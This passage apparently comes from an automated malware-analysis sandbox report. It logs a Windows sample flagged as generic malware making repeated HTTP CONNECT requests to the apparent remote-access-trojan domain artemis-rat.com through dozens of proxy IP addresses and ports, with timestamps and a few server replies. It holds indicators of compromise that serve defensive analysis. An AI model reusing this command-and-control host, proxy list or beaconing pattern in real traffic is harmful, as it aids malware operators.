                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.163258076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.257205009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163407087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1819192.168.2.45255691.148.127.16280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.437761068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1820192.168.2.45487145.230.39.1239997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.437941074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.569538116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.663271904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.757107019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:52.866199970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:04.866209030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:16.881932020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:41.006952047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:29.006870031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1821192.168.2.45489666.228.35.209565607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.438087940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.460163116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.460630894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.554028988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:52.569309950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:16.631833076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:04.631848097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1822192.168.2.455010104.200.152.3041457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.457119942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1823192.168.2.454832106.105.218.244807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.762943983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866321087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.866429090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.866311073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1824192.168.2.45525443.129.228.4678917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.791831017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1825192.168.2.452462111.59.4.8890027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.792351961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866457939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.449927092 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1826192.168.2.454904137.59.48.2080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.934319973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366311073 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1827192.168.2.454127103.97.179.11510807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.979127884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.053992033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1828192.168.2.454792192.252.220.8941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.979321003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1829192.168.2.455272185.132.242.21280837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.061551094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1830192.168.2.45499892.204.134.3893757284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.103555918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.053981066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569686890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.363149881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.866255045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:05.835328102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:43.522481918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1831192.168.2.455263192.252.208.67142877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.103658915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1832192.168.2.454976103.23.101.9741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.109035969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1833192.168.2.452838162.214.163.13774847284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.184293985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366424084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366414070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.366292000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:53.366208076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1834192.168.2.45510354.37.196.18980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.203494072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1835192.168.2.452661165.227.196.37636377284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.213434935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366609097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366463900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1836192.168.2.455060212.108.144.6780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.241935015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362389088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.053282022 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1837192.168.2.45313898.170.57.23141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.242279053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1838192.168.2.45277051.89.173.40551987284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.271687984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366611004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366461992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.366292000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:53.366930962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:05.366209030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:17.381835938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:41.506865025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:29.506894112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1839192.168.2.455181103.76.253.6631297284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.289288998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362514973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366463900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1840192.168.2.452662161.97.163.5290457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.332546949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
